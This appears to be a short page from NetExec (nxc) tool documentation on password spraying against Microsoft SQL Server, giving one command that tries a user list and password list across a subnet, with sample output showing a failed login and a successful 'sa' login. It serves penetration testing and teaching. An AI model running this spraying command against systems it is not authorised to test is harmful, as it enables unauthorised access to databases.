Password Spraying
Password spraying (without bruteforce)
nxc mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Expected Results:
MSSQL 10.10.10.59 1433 None [-] ERROR(TALLY): Line 1: Login failed for user 'test1'.
MSSQL 10.10.10.59 1433 None [+] sa:password (Pwn3d!)
Last updated
Was this helpful?